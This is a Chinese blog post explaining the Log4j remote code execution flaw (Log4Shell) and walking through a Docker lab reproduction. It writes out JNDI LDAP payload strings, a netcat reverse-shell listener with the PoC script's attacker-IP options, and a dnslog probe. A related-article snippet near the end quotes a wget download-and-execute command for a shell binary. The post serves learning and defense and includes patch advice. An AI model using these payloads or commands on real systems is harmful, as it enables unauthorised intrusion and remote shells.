log4j RCE 漏洞

最新推荐文章于 2024-03-18 20:18:19 发布
最新推荐文章于 2024-03-18 20:18:19 发布
阅读量4k 收藏 4
点赞数
分类专栏: 漏洞知识库 文章标签: java 安全 渗透测试 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/b10d9/article/details/122027303
版权

漏洞概述

记录本次log4j可以远程命令执行的漏洞。

  • CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布)

  • CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2

log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。

漏洞原理

本次漏洞主要涉及:LADP和JNDI。其中JNDI(java naming and directory interface)是底层api接口,为java程序提供命名和目录管理功能。java程序可以通过JNDI来访问LDAP服务。

调用代码格式: ${jndi:logging/context-name}

通过构造恶意代码,让服务器执行后访问攻击者的恶意LDAP服务器,然后下载执行具有恶意代码的类文件,实现远程命令执行,如建立回连shell。

恶意代码格式:${jndi:ldap://<host>:<port>/<payload>}

漏洞利用

漏洞利用条件

命令执行利用条件:除了log4j需要在受影响版本外,貌似还要java版本合适,java版本要求在于下面这个参数需设置为true,高版本默认false。

  • Dcom.sun.jndi.ldap.object.trustURLCodebase=true

漏洞利用步骤

实验环境:kozmer/log4j-shell-poc: A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability. (github.com)

搭建实验环境

靶机设置的漏洞利用点在username位置。

git clone https://github.com/kozmer/log4j-shell-poc.git 
# 下载靶机环境 

cd log4j-shell-poc 
docker build -t log4j-shell-poc . 
docker run --network host log4j-shell-poc 
# 建立实验docker环境

利用过程

  1. 下载漏洞利用poc

  2. 下载所需版本的java包,下载地址:Index of java-local/jdk/8u202-b08 (huaweicloud.com)

# 第一步,下载poc.py 
git clone https://github.com/kozmer/log4j-shell-poc.git 
# 在kali中git到本地,其中有个poc.py,就是漏洞利用的脚本 

# 第二步,下载java包 
tar -xf jdk-8u202-linux-x64.tar.gz 
mv jdk-8u202 /usr/bin
# 将下载的java包解压,并移动到/usr/bin 

# 第三步,修改poc.py脚本 
# 编辑poc.py文件,将./jdk1.8.0_202/bin/java的参数全部替换为/usr/bin/jdk1.8.0_202/bin/java。 
# 这里替换的路径就是第二步java包所在路径。 

# 第四步,get shell 
nc -nlvp 9001 
# 本地开启监听 
python3 poc.py --userip 192.168.128.120 --webport 8000 --lport 9001 
# 执行poc文件 
# --userip,指定kali的ip 
# --webport,指定kali http服务的端口 
# --lport,指定本地正在监听的回连端口 

# 第五步,发送恶意代码 
${jndi:ldap://192.168.29.163:1389/a} 
# 脚本执行完会有提示,将以上内容发送给服务器。发送方式:浏览器访问靶机,并在username位置输入恶意代码。 

# 建立shell连接。

看了下代码,几个关键内容:

  1. 运行poc.py脚本后,根据传入的参数,生成Exploit.class,可以看generate_payload()和Exploit.java文件。

  2. 运行脚本后,会在本地启用ldap和http服务,用于靶机的回连。

  3. 根据靶机源代码注释,有问题的参数只设置了username部分,可以看LoginServlet.java文件。

漏洞测试思路

  1. 构建恶意代码:${jndi:ldap://n4erb9.dnslog.cn/exp},看dnslog.cn是否有收到请求记录,初步判断是否存在漏洞。

  2. 再定制恶意类文件,构造连接到攻击机的恶意代码,执行远程连接。

漏洞防护

官方给出了响应的修复建议:Log4j – Apache Log4j Security Vulnerabilities

防护总结来讲:要么升级到修复的版本,要么禁用JndiLookup.class。

参考连接

本次实验环境参考:

其他参考:

包大人在此
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
Log4j又发新版2.17.0,只有彻底搞懂RCE漏洞原因,以不变应万变,小bai也能看懂
Java大将军的博客
12-20 1496
经过一周时间的Log4j2 RCE事件的发酵,事情也变也越来越复杂和有趣,就连 Log4j 官方紧急发布了 2.15.0版本之后没有过多久,又发声明说 2.15.0版本也没有完全解决问题,然后进而继续发布了 2.16.0 版本。大家都以为2.16.0是最终终结版本了,没想到才过多久又爆雷,Log4j 2.17.0横空出世。
log4j漏洞复现
xxx_678的博客
03-18 926
加粗字体解码后:wget http://123.56.136.50/ccccc/shell.elf -O /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf。https://github.com/WhiteHSBG/JNDIExploit/releases/download/v1.4/JNDIExploit.v1.4.zip //github下载地址。视频地址:https://www.youtube.com/watch?
Log4j2漏洞
热门推荐
qq_20025777的博客
12-10 2万+
Log4j2漏洞危害:高危、远程代码执行
log4j CVE-2019-17571 漏洞复现
01-02 1万+
一、漏洞描述 Log4j1.2版本中包含一个SocketServer类,在未经验证的情况下,该SocketServe类很容易接受序列化的日志事件并对其进行反序列化,在结合反序列化工具使用时,可以利用该类远程执行任意代码。 二、漏洞复现 2.1 启动SocketServer端 import org.apache.log4j.Logger; import org.apache.log...
[漏洞复现]log4j漏洞RCE(CVE-2021-44228)
weixin_43895765的博客
12-15 7500
由于排版问题,详情见个人博客文章???? log4j漏洞RCE(CVE-2021-44228)
Log4J RCE漏洞
RuiIDS的博客
01-06 690
首先log4j打印日志有四个级别:debug、info、warn、error;不管哪个方法打印日志,正常的log处理过程中,对${这两个紧邻的字符做检测,一旦遇到类似报答是结构的字符串就会触发替换机制。一旦log字符串中检测到${},就会解析其中的字符串尝试使用 JDNI的lookup()方法查询,因此,只要能可攻至log阐述内容,就有机会实现漏洞利用。或者说服务器会记录用户输入的信息;这样log4j RCE都会被触发;
[Java安全]—log4j2 rce复现
Sentiment的博客
07-09 946
漏洞爆出已经半年多了,可当时还是个java啥都不懂的菜鸡所以也没能及时复现,现在捡起来复现下21年席卷整个安全圈的log4j2漏洞log4j 是 javaweb 的日志组件,用来记录 web日志 去指定下载文件的url 在搜索框或者搜索的 url 里面加上${jndi:ldap://127.0.0.1/test} ,log4j 会对这串代码进行表达式解析,给 lookup 传递一个恶意的参数指定,参数指的是比如 ldap 不存在的资源 $ 是会被直接执行的。后面再去指定下载文件的 url,去下载我们的恶意
Log4j RCE (CVE-2021-44228)】复现及原理分析
新青年1号
04-30 1120
Log4j 是 log for java 的简写,是 Apache 的开源日志记录组件。pox.xml中引入log4j依赖
Log4j2-RCE
xlsj雪松的博客
12-26 2953
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
log4j2_rce 项目
02-23
这是存在log4j jndi注入的项目,可以用idea编译,用网上工具复现一遍
log4j-rce-payload
最新发布
04-15
经测试验证可用lport1389,userip是攻击ip即payload存放地,webport攻击机闲置可访问的web端口,执行成功反弹即显示Send LDAP reference result for a redirecting to http://xxx:xx/Exploit.class ...
log4j2-rce靶场.zip
01-16
在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与...
Apache Log4j2 RCE.md
07-09
Apache Log4j2 RCE
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
bugku apache log4j2 rce
03-16
bugku apache log4j2 rce是指一个漏洞,可以通过Apache Log4j2库中的一个特定功能,实现远程代码执行(RCE)攻击。该漏洞可能会导致攻击者获取系统权限,进而对受害者进行攻击和控制。建议用户及时升级相关软件版本,以避免受到攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值